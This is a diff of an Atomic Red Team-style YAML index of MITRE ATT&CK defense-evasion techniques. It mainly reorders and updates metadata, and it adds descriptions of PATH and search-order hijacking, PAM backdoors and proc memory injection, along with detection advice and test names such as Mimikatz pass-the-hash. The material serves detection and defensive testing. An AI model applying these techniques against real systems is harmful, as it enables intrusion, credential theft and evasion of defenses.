- x_mitre_defense_bypassed:
- - Heuristic Detection
- - Host forensic analysis
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Wayne Silva, Countercept
+ x_mitre_data_sources:
+ - API monitoring
+ - Process monitoring
+ - Windows event logs
+ x_mitre_platforms:
+ - Windows
identifier: T1134.004
atomic_tests:
- name: Parent PID Spoofing using PowerShell
@@ -27835,21 +28657,21 @@ defense-evasion:
phase_name: lateral-movement
modified: '2020-03-23T16:24:34.766Z'
created: '2020-01-30T16:36:51.184Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Travis Smith, Tripwire
- x_mitre_data_sources:
- - Authentication logs
+ x_mitre_defense_bypassed:
+ - System Access Controls
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: Audit all logon and credential use events and review for
discrepancies. Unusual remote logins that correlate with other suspicious
activity (such as writing and executing binaries) may indicate malicious activity.
NTLM LogonType 3 authentications that are not associated to a domain login
and are not anonymous logins are suspicious.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_defense_bypassed:
- - System Access Controls
+ x_mitre_data_sources:
+ - Authentication logs
+ x_mitre_contributors:
+ - Travis Smith, Tripwire
+ x_mitre_platforms:
+ - Windows
identifier: T1550.002
atomic_tests:
- name: Mimikatz Pass the Hash
@@ -27963,23 +28785,23 @@ defense-evasion:
phase_name: lateral-movement
modified: '2020-03-12T17:03:16.122Z'
created: '2020-01-30T17:03:43.072Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Vincent Le Toux
- - Ryan Becwar
- x_mitre_data_sources:
- - Authentication logs
+ x_mitre_defense_bypassed:
+ - System Access Controls
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_system_requirements:
+ - Kerberos authentication enabled
x_mitre_detection: |-
Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
Event ID 4769 is generated on the Domain Controller when using a golden ticket after the KRBTGT password has been reset twice, as mentioned in the mitigation section. The status code 0x1F indicates the action has failed due to "Integrity check on decrypted field failed" and indicates misuse by a previously invalidated golden ticket.(Citation: CERT-EU Golden Ticket Protection)
- x_mitre_system_requirements:
- - Kerberos authentication enabled
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_defense_bypassed:
- - System Access Controls
+ x_mitre_data_sources:
+ - Authentication logs
+ x_mitre_contributors:
+ - Vincent Le Toux
+ - Ryan Becwar
+ x_mitre_platforms:
+ - Windows
identifier: T1550.003
atomic_tests:
- name: Mimikatz Kerberos Ticket Attack
@@ -28045,22 +28867,22 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-25T20:59:05.209Z'
created: '2020-02-11T19:05:45.829Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - File monitoring
+ - DLL monitoring
+ x_mitre_contributors:
+ - Vincent Le Toux
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
x_mitre_detection: |-
Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- x_mitre_contributors:
- - Vincent Le Toux
- x_mitre_data_sources:
- - File monitoring
- - DLL monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
identifier: T1556.002
atomic_tests:
- name: Install and Register Password Filter DLL
@@ -28095,6 +28917,17 @@ defense-evasion:
elevation_required: true
T1574.007:
technique:
+ id: attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32
+ description: |-
+ Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line.
+
+ The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\system32 (e.g., C:\Windows\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.
+
+ For example, if C:\example path precedes C:\Windows\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\example path will be called instead of the Windows system "net" when "net" is executed from the command-line.
+ name: Path Interception by PATH Environment Variable
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1574.007
@@ -28102,17 +28935,6 @@ defense-evasion:
- external_id: CAPEC-capec
source_name: capec
url: https://capec.mitre.org/data/definitions/capec.html
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Path Interception by PATH Environment Variable
- description: |-
- Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line.
-
- The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\system32 (e.g., C:\Windows\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.
-
- For example, if C:\example path precedes C:\Windows\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\example path will be called instead of the Windows system "net" when "net" is executed from the command-line.
- id: attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -28121,7 +28943,7 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-26T19:59:42.456Z'
+ modified: '2020-06-20T22:02:40.983Z'
created: '2020-03-13T14:10:43.424Z'
x_mitre_platforms:
- Windows
@@ -28137,10 +28959,33 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_defense_bypassed:
- - Process whitelisting
+ - Application control
atomic_tests: []
T1574.008:
technique:
+ created: '2020-03-13T17:48:58.999Z'
+ modified: '2020-03-26T20:03:27.496Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
+ id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
+ description: |-
+ Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
+
+ Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.
+
+ For example, "example.exe" runs "cmd.exe" with the command-line argument net user. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then cmd.exe /C net user will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property)
+
+ Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
+ name: Path Interception by Search Order Hijacking
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1574.008
@@ -28163,29 +29008,6 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
description: Microsoft. (2011, October 24). Environment Property. Retrieved
July 27, 2016.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Path Interception by Search Order Hijacking
- description: |-
- Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
-
- Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.
-
- For example, "example.exe" runs "cmd.exe" with the command-line argument net user. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then cmd.exe /C net user will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property)
-
- Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
- id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- modified: '2020-03-26T20:03:27.496Z'
- created: '2020-03-13T17:48:58.999Z'
x_mitre_platforms:
- Windows
x_mitre_contributors:
@@ -28210,17 +29032,16 @@ defense-evasion:
atomic_tests: []
T1574.009:
technique:
- id: attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b
- description: |-
- Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
-
- Service paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\unsafe path with space\program.exe vs. "C:\safe path with space\program.exe"). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\program files\myapp.exe, an adversary may create a program at C:\program.exe that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide)
-
- This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.
- name: Path Interception by Unquoted Path
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created: '2020-03-13T13:51:58.519Z'
+ modified: '2020-03-26T19:55:39.867Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
external_references:
- source_name: mitre-attack
external_id: T1574.009
@@ -28244,16 +29065,17 @@ defense-evasion:
url: https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
description: absolomb. (2018, January 26). Windows Privilege Escalation Guide.
Retrieved August 10, 2018.
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- modified: '2020-03-26T19:55:39.867Z'
- created: '2020-03-13T13:51:58.519Z'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Path Interception by Unquoted Path
+ description: |-
+ Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
+
+ Service paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\unsafe path with space\program.exe vs. "C:\safe path with space\program.exe"). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\program files\myapp.exe, an adversary may create a program at C:\program.exe that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide)
+
+ This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.
+ id: attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b
x_mitre_version: '1.0'
x_mitre_is_subtechnique: true
x_mitre_detection: |-
@@ -28297,12 +29119,75 @@ defense-evasion:
del "C:\Time.log"
name: command_prompt
elevation_required: true
- T1545.001:
+ T1556.003:
technique:
external_references:
- source_name: mitre-attack
- external_id: T1545.001
- url: https://attack.mitre.org/techniques/T1545/001
+ external_id: T1556.003
+ url: https://attack.mitre.org/techniques/T1556/003
+ - source_name: Apple PAM
+ url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+ description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+ Retrieved June 25, 2020.
+ - source_name: Man Pam_Unix
+ url: https://linux.die.net/man/8/pam_unix
+ description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+ 25, 2020.
+ - source_name: Red Hat PAM
+ url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+ description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+ (PAM). Retrieved June 25, 2020.
+ - source_name: PAM Backdoor
+ url: https://github.com/zephrax/linux-pam-backdoor
+ description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+ 25, 2020.
+ - source_name: PAM Creds
+ url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+ description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+ PAM backdoors & DNS requests. Retrieved June 26, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Pluggable Authentication Modules
+ description: |-
+ Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so, which retrieves, sets, and verifies account authentication information in /etc/passwd and /etc/shadow.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
+
+ Adversaries may modify components of the PAM system to create backdoors. PAM components, such as pam_unix.so, can be patched to accept arbitrary adversary supplied values as legitimate credentials.(Citation: PAM Backdoor)
+
+ Malicious modifications to the PAM system may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plain-text since PAM does not store passwords.(Citation: PAM Creds)(Citation: Apple PAM)
+ id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-07-13T21:23:01.370Z'
+ created: '2020-06-26T04:01:09.648Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - root
+ x_mitre_detection: |-
+ Monitor PAM configuration and module paths (ex: /etc/pam.d/) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
+
+ Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+ x_mitre_data_sources:
+ - Authentication logs
+ - File monitoring
+ x_mitre_contributors:
+ - Scott Knight, @sdotknight, VMware Carbon Black
+ - George Allen, VMware Carbon Black
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ atomic_tests: []
+ T1205.001:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1205.001
+ url: https://attack.mitre.org/techniques/T1205/001
- url: https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
@@ -28317,7 +29202,7 @@ defense-evasion:
This technique has been observed to both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.
The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.
- id: attack-pattern--90410d1b-b01b-4fe9-9cea-c0a3427a419c
+ id: attack-pattern--8868cb5b-d575-4a60-acb2-07d37389a2fd
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -28326,22 +29211,21 @@ defense-evasion:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: command-and-control
- modified: '2020-01-22T20:26:58.120Z'
- created: '2020-01-22T20:26:58.120Z'
- x_mitre_platforms:
- - Linux
- - macOS
+ modified: '2020-07-01T18:23:25.002Z'
+ created: '2020-07-01T18:23:25.002Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: Record network packets sent to and from the system, looking
+ for extraneous packets that do not belong to established flows.
x_mitre_data_sources:
- Netflow/Enclave netflow
- Packet capture
- x_mitre_detection: Record network packets sent to and from the system, looking
- for extraneous packets that do not belong to established flows.
- x_mitre_defense_bypassed:
- - Defensive network service scanning
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1055.002:
technique:
@@ -28379,12 +29263,16 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-02-21T22:34:26.937Z'
+ modified: '2020-06-20T22:19:58.813Z'
created: '2020-01-14T01:27:31.344Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Application control
+ x_mitre_data_sources:
+ - Process monitoring
+ - API monitoring
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -28396,14 +29284,10 @@ defense-evasion:
process behavior to determine if a process is performing actions it usually
does not, such as opening network connections, reading files, or other suspicious
actions that could relate to post-compromise behavior. "
- x_mitre_permissions_required:
- - User
- x_mitre_data_sources:
- - Process monitoring
- - API monitoring
- x_mitre_defense_bypassed:
- - Anti-virus
- - Process whitelisting
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1542:
technique:
@@ -28434,21 +29318,11 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-03-23T23:50:48.319Z'
+ modified: '2020-05-19T21:22:38.174Z'
created: '2019-11-13T14:44:49.439Z'
- x_mitre_is_subtechnique: false
- x_mitre_detection: |-
- Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes. Take snapshots of boot records and firmware and compare against known good images. Log changes to boot records, BIOS, and EFI, which can be performed by API calls, and compare against known good behavior and patching.
-
- Disk check, forensic utilities, and data from device drivers (i.e. processes and API calls) may reveal anomalies that warrant deeper investigation. (Citation: ITWorld Hard Disk Health Dec 2014)
- x_mitre_version: '1.0'
- x_mitre_defense_bypassed:
- - Anti-virus
- - Host intrusion prevention systems
- - File monitoring
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
+ x_mitre_platforms:
+ - Linux
+ - Windows
x_mitre_data_sources:
- VBR
- MBR
@@ -28458,13 +29332,42 @@ defense-evasion:
- EFI
- BIOS
- API monitoring
- x_mitre_platforms:
- - Linux
- - Windows
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Host intrusion prevention systems
+ - File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_detection: |-
+ Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes. Take snapshots of boot records and firmware and compare against known good images. Log changes to boot records, BIOS, and EFI, which can be performed by API calls, and compare against known good behavior and patching.
+
+ Disk check, forensic utilities, and data from device drivers (i.e. processes and API calls) may reveal anomalies that warrant deeper investigation. (Citation: ITWorld Hard Disk Health Dec 2014)
+ x_mitre_is_subtechnique: false
atomic_tests: []
T1055.009:
technique:
- id: attack-pattern--d201d4cc-214d-4a74-a1ba-b3fa09fd4591
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1055.009
+ url: https://attack.mitre.org/techniques/T1055/009
+ - url: http://hick.org/code/skape/papers/needle.txt
+ description: skape. (2003, January 19). Linux x86 run-time process manipulation.
+ Retrieved December 20, 2017.
+ source_name: Uninformed Needle
+ - source_name: GDS Linux Injection
+ url: https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html
+ description: McNamara, R. (2017, September 5). Linux Based Inter-Process Code
+ Injection Without Ptrace(2). Retrieved February 21, 2020.
+ - source_name: DD Man
+ url: http://man7.org/linux/man-pages/man1/dd.1.html
+ description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
+ February 21, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Proc Memory
description: "Adversaries may inject malicious code into processes via the /proc
filesystem in order to evade process-based defenses as well as possibly elevate
privileges. Proc memory injection is a method of executing arbitrary code
@@ -28488,36 +29391,17 @@ defense-evasion:
and possibly elevated privileges. Execution via proc memory injection may
also evade detection from security products since the execution is masked
under a legitimate process. "
- name: Proc Memory
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- external_id: T1055.009
- url: https://attack.mitre.org/techniques/T1055/009
- - url: http://hick.org/code/skape/papers/needle.txt
- description: skape. (2003, January 19). Linux x86 run-time process manipulation.
- Retrieved December 20, 2017.
- source_name: Uninformed Needle
- - source_name: GDS Linux Injection
- url: https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html
- description: McNamara, R. (2017, September 5). Linux Based Inter-Process Code
- Injection Without Ptrace(2). Retrieved February 21, 2020.
- - source_name: DD Man
- url: http://man7.org/linux/man-pages/man1/dd.1.html
- description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
- February 21, 2020.
+ id: attack-pattern--d201d4cc-214d-4a74-a1ba-b3fa09fd4591
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-26T20:33:52.548Z'
+ modified: '2020-06-20T22:25:55.331Z'
created: '2020-01-14T01:34:10.588Z'
x_mitre_defense_bypassed:
- - Process whitelisting
+ - Application control
- Anti-virus
x_mitre_data_sources:
- Process monitoring
@@ -28531,7 +29415,6 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- - macOS
atomic_tests: []
T1055.013:
technique:
@@ -28607,29 +29490,29 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-26T21:05:42.921Z'
+ modified: '2020-06-20T22:27:21.304Z'
created: '2020-01-14T17:19:50.978Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Application control
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - API monitoring
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ - User
x_mitre_detection: |-
Monitor and analyze calls to CreateTransaction, CreateFileTransacted, RollbackTransaction, and other rarely used functions indicative of TxF activity. Process Doppelgänging also invokes an outdated and undocumented implementation of the Windows process loader via calls to NtCreateProcessEx and NtCreateThreadEx as well as API calls used to modify memory within another process, such as WriteProcessMemory. (Citation: BlackHat Process Doppelgänging Dec 2017) (Citation: hasherezade Process Doppelgänging Dec 2017)
Scan file objects reported during the PsSetCreateProcessNotifyRoutine, (Citation: Microsoft PsSetCreateProcessNotifyRoutine routine) which triggers a callback whenever a process is created or deleted, specifically looking for file objects with enabled write access. (Citation: BlackHat Process Doppelgänging Dec 2017) Also consider comparing file objects loaded in memory to the corresponding file on disk. (Citation: hasherezade Process Doppelgänging Dec 2017)
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - User
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- - API monitoring
- x_mitre_defense_bypassed:
- - Anti-virus
- - Process whitelisting
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1055.012:
technique:
@@ -28676,12 +29559,16 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-26T21:00:39.428Z'
+ modified: '2020-06-20T22:28:08.758Z'
created: '2020-01-14T17:21:54.470Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_defense_bypassed:
+ - Application control
+ - Anti-virus
+ x_mitre_data_sources:
+ - Process monitoring
+ - API monitoring
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -28694,14 +29581,10 @@ defense-evasion:
process behavior to determine if a process is performing actions it usually
does not, such as opening network connections, reading files, or other suspicious
actions that could relate to post-compromise behavior. "
- x_mitre_permissions_required:
- - User
- x_mitre_data_sources:
- - Process monitoring
- - API monitoring
- x_mitre_defense_bypassed:
- - Process whitelisting
- - Anti-virus
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
identifier: T1055.012
atomic_tests:
- name: Process Hollowing using PowerShell
@@ -28776,7 +29659,7 @@ defense-evasion:
description: GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved
December 20, 2017.
source_name: GNU Acct
- - url: https://access.redhat.com/documentation/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing
+ - url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing
description: Jahoda, M. et al.. (2017, March 14). redhat Security Guide -
Chapter 7 - System Auditing. Retrieved December 20, 2017.
source_name: RHEL auditd
@@ -28796,23 +29679,12 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-26T21:05:43.152Z'
+ modified: '2020-06-20T22:28:45.651Z'
created: '2017-05-31T21:30:47.843Z'
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Anastasios Pingios
- - Christiaan Beek, @ChristiaanBeek
- - Ryan Becwar
- x_mitre_data_sources:
- - API monitoring
- - File monitoring
- - DLL monitoring
- - Process monitoring
- - Named Pipes
- x_mitre_defense_bypassed:
- - Process whitelisting
- - Anti-virus
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -28835,10 +29707,21 @@ defense-evasion:
